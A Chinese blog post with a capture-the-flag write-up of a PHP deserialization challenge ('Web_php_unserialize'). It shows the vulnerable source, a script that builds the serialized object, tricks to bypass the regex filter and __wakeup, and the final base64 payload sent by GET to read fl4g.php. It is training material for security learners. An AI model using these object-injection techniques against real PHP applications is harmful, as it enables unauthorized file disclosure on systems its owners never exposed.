Web_php_unserialize

于 2024-09-08 12:30:47 发布
阅读量968 收藏 16
点赞数 13
文章标签: 前端 php android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86950650/article/details/142024912
版权

php完整脚本

一、题目概览

解析php代码,可以看出是php反序列化漏洞的题

 <?php 
class Demo { //一个类
    private $file = 'index.php';    //私有变量,本题需要注意的细节
    public function __construct($file) {     //构造函数
        $this->file = $file; 
    }
    function __destruct() {     //析构函数
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() {     //绕过wakeup函数
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) {     //检查是否通过get方式传参
    $var = base64_decode($_GET['var']);     //将var通过base64编码
    if (preg_match('/[oc]:\d+:/i', $var)) {    //正则匹配 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

思路:构造参数使fl4g.php层层伪装,最后通过get方式将参数赋值给var,便可得到flag

二、基础知识

1、魔术函数

_construct 构造函数,实例化对象使自动调用该函数

_destruct析构函数,该函数会在类的一个对象被删除时自动调用。

_wakeup函数,在反序列化之前调用该函数,但是如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过_wakeup函数。

2、常见php函数

str_replace函数,替换字符串(区分大小写),后面会用到来写php脚本

preg_match正则匹配函数,用于匹配字符串中是否有特定字符

三、解题步骤

要想得到fl4g.php,需要满足以下条件:

1、绕过preg_match函数

if (isset($_GET['var'])) {      $var = base64_decode($_GET['var']);      if (preg_match('/[oc]:\d+:/i', $var)) {          die('stop hacking!');      } else {         @unserialize($var);
}

首先将字符串"fl4g.php"序列化,可以直接手写,也可以用php脚本来执行

脚本如下:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
	$A=new Demo("fl4g.php");
	$C=serialize($A);
	echo $C;
?>

得到的结果:

可以看到的是,序列化之后的结果有两个特殊字符,这是由于file是private属性的,序列化之后会在其前后有空格,即%00,protect属性的变量也类似。

我们看看上面fl4g.php序列化的结果:

  1. O:4:"Demo":这部分表示一个对象,其类名为"Demo"。对象序列化的长度为4。

  2. :1::表示这个对象有1个属性或成员。

  3. {s:10:" Demo file";s:8:"fl4g.php";}:这是对象的成员。

    • s:10:" Demo file":表示一个字符串,长度为10,内容为" Demo file"。
    • s:8:"fl4g.php":表示另一个字符串,长度为8,内容为"fl4g.php"。

所以,这个序列化字符串表示一个名为"Demo"的类的一个实例,该实例有一个属性,其中第一个属性是一个长度为10的字符串" Demo file",第二个属性是一个长度为8的字符串"fl4g.php"。

现在来分析**preg_match('/[oc]:\d+:/i', $var)**

  • [oc]:这是一个字符集,表示匹配其中的任何一个字符,即"o"或"c"。
  • ::这是一个普通字符,表示直接匹配":"字符。
  • \d+:这是一个量词,表示匹配一个或多个数字。
  • ::再次,这是一个普通字符,表示直接匹配":"字符。
  • i:这是一个修饰符,表示匹配时不区分大小写。

综上,能被该函数过滤的有“o:数字:”或者“c:数字:”,我们要想绕过preg_match()函数,就只要不满足上述条件即可,函数想过滤”O:4“,我们只要稍微修改一下改成”O:+4“就行。

执行代码如下:

$C = str_replace('O:4', 'O:+4',$C);
2、绕过_wakeup()函数

前面我们讲了,如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过_wakeup函数,那么,我们只需要将对象属性的个数增大即可

我们将1改为其他数就行,这里我们改为2,代码如下:

$C = str_replace(':1:', ':2:',$C);//绕过wakeup
3、必须是base64加密

将上述代码执行得到的结果为

可以看到还是有空格键的存在,选择复制,发现复制不了,刚开始想的是,手工将空格添上,再base64加密,后来发现不行,结果不对。

于是采用代码来执行base64的加密:

$C=base64_encode($C);

执行得到的base64加密如下:

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

4、get方式传参得flag

/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

得到flag

2401_86950650
关注
【网络安全 | CTF】攻防世界 Web_php_unserialize 题详析
等风来
05-28 3949
这段代码接收参数 var,使用 base64_decode 函数对 var 进行码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
php_igbinary-php5.5版本
07-25
中添加`extension=php_igbinary.dll`(对于Windows系统)或`extension=igbinary.so`(对于Unix/Linux系统),然后重启Web服务器。 总的来说,`igbinary`扩展是提高PHP应用程序性能的一个有效工具,尤其在处理大量...
攻防世界-Web_php_unserialize
Mr_helloword的博客
08-10 4819
Web_php_unserialize 源码: <?php class Demo { //定义一个类 private $file = 'index.php'; //变量属性 public function __construct($file) { //类方法 $this->file = $file; } function __destruct() { echo @highlight_file(
Web_php_unserialize攻防世界
bbzzqqii的博客
06-02 807
攻防世界web进阶区Web_php_unserialize做题经验分享
WEB:Web_php_unserialize
sleepywin的博客
07-15 1176
而正则匹配的规则是: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤 .很明显 , 因为 serialize() 的参数为 object ,因此参数类型肯定为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配。是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。
PHP中json_encode、json_decode与serializeunserialize的性能测试分析
10-29
PHP提供了两种主要的方法用于实现这一功能:一是内置的serializeunserialize函数,二是使用JSON格式的json_encode和json_decode函数。本文通过实验比较了这两种方法的性能差异。 首先,我们要了序列化与反序列...
php_igbinary-1.1.1到2.0.8版本大全
12-29
PHP_igbinary是一款高效的数据序列化扩展,专为PHP设计,用于替代默认的PHP序列化方式(如serializeunserialize)。它的主要目的是提高在数据库存储、缓存系统以及跨进程通信中的性能,尤其是在大型和高负载的Web...
php_igbinary 5.3-7.1版本扩展
04-10
4. **Web服务**: 在API调用中,igbinary序列化的数据可以作为高效的数据传输格式。 ### 四、兼容性与安装 1. **版本兼容**: `php_igbinary`扩展支持PHP 5.3到PHP 7.1,这意味着它能在广泛的老版本和新版本的PHP...
php_redis.dll和php_igbinary.dll-php5.6版下载
07-25
2. **性能提升**:igbinary序列化/反序列化的速度远超PHP默认的`serialize`/`unserialize`,减少了处理时间,提升了整体性能。 3. **跨语言兼容**:尽管主要是为PHP设计,igbinary格式也可用于其他语言,便于多语言...
攻防世界之Web_php_unserialize(超详细WP)
金 帛的博客
03-02 3596
攻防世界WP
攻防世界Web_php_unserialize
qq_51233573的博客
03-10 2589
最近开始刷攻防世界的web题目,遇到一个比较有意思的题目。ctf小白大家勿喷 访问题目链接 是一段php代码 对代码进行初步审计 发现unserialize函数 可以确定是一个php反序列化的利用 由于刚开始学习php的反序列化 对php不是特别熟悉所以对代码进行逐行析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...
PHP反序列化-(web_php_unserialize)
分享与记录
07-13 1838
题目内容 代码分析 可以很明显地看出这是一道PHP反序列化地题目 首先判断当前是否存在 GET 参数 ” var ” , 若存在则对其进行 Base64 码后 存入 $var 变量 . 若不存在则输出当前页面源码 对 $var 进行一个正则过滤 , 若通过正则过滤 , 则对其进行反序列化操作, 否则响应提示信息 1. 题目中给出一个 Demo 类 , 需要注意一下其中三个魔术方法 __wakeup() 该方法是PHP反序列化时执行的第一个方法 , unserialize()会先检查是否存在 __
web | CTF】攻防世界 Web_php_unserialize
最新发布
weixin_46301214的博客
02-21 1087
变量名:Demofile 变成 \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"大概意思应该是当反序列化的 属性变量数 大于 当前类的属性变量数 的时候,就什么安全性因素,就不触发。天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了。【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可。多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)既不简单,也不难,我也学了几天才算比较掌握。
[web] Web_php_unserialize
lonmar的博客
07-03 933
Web_php_unserialize 源码如下: 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 4. 正则 : /[oc]:\d+:/i \d 是匹配一个数字 +表示一个或多个 i忽略大小写(修饰符) [xyz]字符集合,匹配所包含的任意一个字符(x,y,z
攻防世界web_php_unserialize
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标进行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP反序列化漏洞的深入理和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的析和理。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值